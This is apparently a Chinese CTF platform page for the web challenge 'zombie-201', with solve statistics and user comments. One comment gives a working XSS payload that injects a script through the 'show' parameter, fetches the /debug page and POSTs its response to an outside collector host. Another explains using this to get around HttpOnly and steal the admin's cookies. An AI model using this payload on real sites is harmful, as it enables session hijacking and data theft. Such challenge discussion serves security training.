zombie-201WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 39
提  示:
描  述:
wctf{}
评论
vincentshine 1月前

http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>

回复 0

justsosoloveyou 1年前

httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。

回复 7

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

ZIO2020 攻破了该题 20天前
sraiL 攻破了该题 1月前
n0th1n9 攻破了该题 1月前
rouzongbaba 攻破了该题 1月前
vnuesa 攻破了该题 1月前
vincentshine 攻破了该题 1月前
krioee 攻破了该题 2月前
UrgerZ 攻破了该题 2月前
garlicfish 攻破了该题 3月前
Yuelan 攻破了该题 4月前
dimo 攻破了该题 4月前
liuwc 攻破了该题 4月前
skyhigh 攻破了该题 5月前
wangjianguo 攻破了该题 5月前
一只小羊 攻破了该题 6月前
WindJ0Y 攻破了该题 6月前
Tao23 攻破了该题 6月前
to5ny 攻破了该题 6月前
wobushicxk 攻破了该题 7月前
1512624649 攻破了该题 7月前
问题反馈